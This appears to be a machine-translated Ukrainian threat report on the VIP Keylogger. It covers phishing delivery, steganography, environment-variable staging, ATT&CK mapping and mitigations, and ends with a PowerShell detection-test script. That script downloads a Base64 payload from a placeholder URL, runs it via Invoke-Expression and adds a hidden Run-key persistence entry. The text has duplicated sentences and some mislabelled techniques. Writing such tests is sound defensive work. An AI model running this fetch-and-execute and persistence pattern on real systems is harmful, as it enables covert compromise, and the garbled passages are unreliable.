VIP Кейлоггер та його Багатошарові Тактики Ухилення

Резюме

VIP Keylogger – це модульна загроза, яка викрадає інформацію і постачається через фішинг-приманки, такі як фальшиві сповіщення про платежі банку. Її ланцюг зараження базується на шкідливих VBS-, JavaScript- або bat-файлах, які використовують сильну обфускацію, стеганографію в PNG-изображеннях і зловживання змінними оточення для приховування етапів PowerShell перед запуском остаточного кейлогера. Коли він стає активним, шкідливе програмне забезпечення захоплює облікові дані, знімки екрана, вміст буфера обміну та паролі Wi-Fi, а потім ексфільтрує дані через декілька каналів керування та управління. Зусилля щодо виявлення слід сконцентрувати на підозрілих змінах реєстру, незвичайних значеннях змінних оточення та аномальних переходах від виконання скрипта до виконуваних файлів.

Розслідування

Команда досліджень загроз Splunk переглянула понад 200 зразків завантажувачів, зібраних у березні та квітні 2026 року, документуючи їхні шаблони найменувань, варіанти завантажувачів та використання стеганографії у файлах PNG для доставки корисного навантаження. Дослідники відтворили процес деобфускації, виявили зловживання змінною oточення INTERNAL_DB_CACHE і простежили стійкість до ключа реєстру UserInitMprLogonScript. Звіт також зіставив кожну спостережену поведінку з відповідною технікою MITRE ATT&CK для підтримки проектування виявлення. registry key. The report also mapped each observed behavior to relevant MITRE ATT&CK techniques to support detection engineering.

Пом’якшення

Організації повинні зупинити початкові фішинг-спроби шляхом посилення захисту електронної пошти та фільтрації URL-адрес. Захисникам слід стежити за створенням і модифікацією значень HKCUEnvironment, особливо за завищеними записами або використанням змінної змінної. Виконання скриптових завантажувачів з каталогів, доступних для запису користувачів, слід обмежити, а режим мовлення PowerShell Constrained Language Mode слід запроваджувати, де це можливо. Інструменти безпеки робочих станцій також повинні виявляти ін’єкцію процесу в INTERNAL_DB_CACHE та підозрілу активність та підозрілу активність netsh. Відповідь У разі виявлення індикатора VIP Keylogger ізолюйте уражений хост, зберіть дані з оперативної пам’яті та журнали останнього виконання процесу, проведіть пошук відомих артефактів реєстру, URL-адрес командного керування, заснованих на PNG, та отриманих файлів. Шкідливі скрипти повинні бути видалені, виявлені облікові дані – скинуті, а більш широкий обсяг перевірки повинен бути виконаний по всьому середовищу на предмет схожих артефактів завантажувача та механізмів стійкості.

Response

"графік TB %% Визначення класів classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef operator fill:#ff9900 %% Вузли initial_access["<b>Дія</b> – <b>T1566 Фішинг</b><br/>Шкідливі .vbs/.js/.bat доставляються електронною поштою"] class initial_access action execution["<b>Дія</b> – <b>T1059.005 Visual Basic</b>, <b>T1059.007 JavaScript</b>, <b>T1059.001 PowerShell</b><br/>Скрипт-етапи виконані на хості"] class execution action obfuscation["<b>Дія</b> – <b>T1027.016 Вставлення Необхідного Коду</b>, <b>T1027.003 Стеганографія</b>, <b>T1027.009 Включене Корисне Навантаження</b><br/>Корисне навантаження приховане або замасковане"] class obfuscation action persistence["<b>Дія</b> – <b>T1574.007 Перехоплення Передачі Виконання</b> через сценарій запуску реєстру (UserInitMprLogonScript)<br/><b>T1037.001 Сценарій Ініціації Входу</b><br/>Забезпечує виконання коду під час входу"] class persistence action priv_esc["<b>Дія</b> – <b>T1055.002 Ін’єкція Процесу PE</b>, <b>T1055.001 Ін’єкція DLL</b>, <b>T1620 Відображуване Завантаження Коду</b><br/>Підвищує привілеї та обходить захист"] class priv_esc action credential_access["<b>Дія</b> – <b>T1555.003 Дані Браузера</b>, <b>T1056.001 Кеілоггінг</b>, <b>T1115 Перехоплення Буфера Обміну</b><br/>Збирає облікові дані користувача"] class credential_access action discovery["<b>Дія</b> – <b>T1596.005 Відкриття Зовнішньої IP</b> через загальнодоступні сервіси<br/><b>T1016.002 Відкриття Пароля Wi-Fi</b><br/>Збирає інформацію про мережу"] class discovery action collection["<b>Дія</b> – <b>T1113 Захоплення Екрану</b><br/>Збирає візуальні дані з робочого столу"] class collection action c2["<b>Дія</b> – <b>T1071.001 Веб Протоколи</b> та Telegram bot API<br/>Забезпечує віддалене командування та управління"] class c2 action defense_evasion["<b>Дія</b> – <b>T1070.004 Видалення Файлів</b>, <b>T1070.010 Видалення Індикаторів</b><br/>Видаляє докази після операції"] class defense_evasion action %% З’єднання, що показують потік атаки initial_access –>|leads_to| execution execution –>|leads_to| obfuscation obfuscation –>|leads_to| persistence persistence –>|leads_to| priv_esc priv_esc –>|leads_to| credential_access credential_access –>|leads_to| discovery discovery –>|leads_to| collection collection –>|leads_to| c2 c2 –>|leads_to| defense_evasion "

Передумова: має пройти перевірка телеметрії та первинної перевірки.

Обґрунтування: цей розділ описує точне виконання технік та практик противника (TTP), розроблених для запуску правила виявлення. Команди та наратив ПОВИННІ напряму відображати ідентифіковані TTP і прагнути генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або несхожі приклади призведуть до неправильного діагнозу.

Наратив і команди атаки:

• Початкова розвідка

  1. – нападник запускає (T1016.002) для виявлення відносин довіри домену. (T1016.002) для виявлення відносин довіри домену. Отримання корисного навантаження
  2. – використовуючи (T1071.001), нападник завантажує DLL з кодом, закодованим в Base64, який реалізує кейлогер (T1056.001). (T1071.001), нападник завантажує DLL з кодом, закодованим в Base64, який реалізує кейлогер (T1056.001). Упорядкування через змінну оточення
  3. – завантажений рядок зберігається в змінній оточення на рівні користувача через . Цей крок задовольняє фокус правила виявлення на маніпуляції змінними оточення. [Environment]::SetEnvironmentVariableДинамічне виконання
  4. – зловмисник негайно виконує корисне навантаження за допомогою (T1059.001). Кейлоггер починає захоплення натискань клавіш, скріншотів (T1113) та даних буфера обміну (T1115). (T1059.001). Кейлоггер починає захоплення натискань клавіш, скріншотів (T1113) та даних буфера обміну (T1115). Очищення
  5. – після встановлення стійкості (наприклад, створення RunKey, T1037.001) зловмисник видаляє тимчасовий DLL з диска (T1070.004) і видаляє змінну оточення, щоб зменшити судово-медичний слід. Сценарій зворотної перевірки:

• Сценарій нижче відтворює точні кроки та генерує телеметрію, яку правило Sigma очікує. # Симуляція VIP Keylogger – PowerShell # ————————————————- # 1. Завантажити підставне корисне навантаження (рядок, закодований в Base64) $payloadUrl = “https://raw.githubusercontent.com/example/dummy-keylogger/main/payload.b64” $b64Payload = (Invoke-WebRequest -Uri $payloadUrl -UseBasicParsing).Content.Trim() # 2. Зберегти корисне навантаження у змінній середовища на рівні користувача $envVarName = “VIPPayload” [Environment]::SetEnvironmentVariable($envVarName, $b64Payload, “User”) # 3. Декодувати та виконати корисне навантаження через Invoke-Expression $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64Payload)) Invoke-Expression $decoded # 4. (Необов’язково) Стійкість через Run Key – демонструє T1037.001 $runKey = “HKCU:SoftwareMicrosoftWindowsCurrentVersionRun” Set-ItemProperty -Path $runKey -Name “VIPKeylogger” -Value “powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command `”Invoke-Expression $env:$envVarName`”” # 5. Очищення – видалення змінної середовища та запису Run Key Start-Sleep -Seconds 30 # дати змогу зафіксувати деякі дії Remove-ItemProperty -Path $runKey -Name “VIPKeylogger” -ErrorAction SilentlyContinue [Environment]::SetEnvironmentVariable($envVarName, $null, “User”)

  Команди очищення:

• Виконайте ці команди, щоб повернути систему в початковий стан після тесту. # Видалити змінну оточення, створену для тесту [Environment]::SetEnvironmentVariable(“VIPPayload”, $null, “User”) # Видалити запис ключа стійкості Run, якщо він існує $runKey = “HKCU:SoftwareMicrosoftWindowsCurrentVersionRun” Remove-ItemProperty -Path $runKey -Name “VIPKeylogger” -ErrorAction SilentlyContinue # Очистити будь-які залишкові записи історії PowerShell (необов’язково) Clear-History

  Потік атаки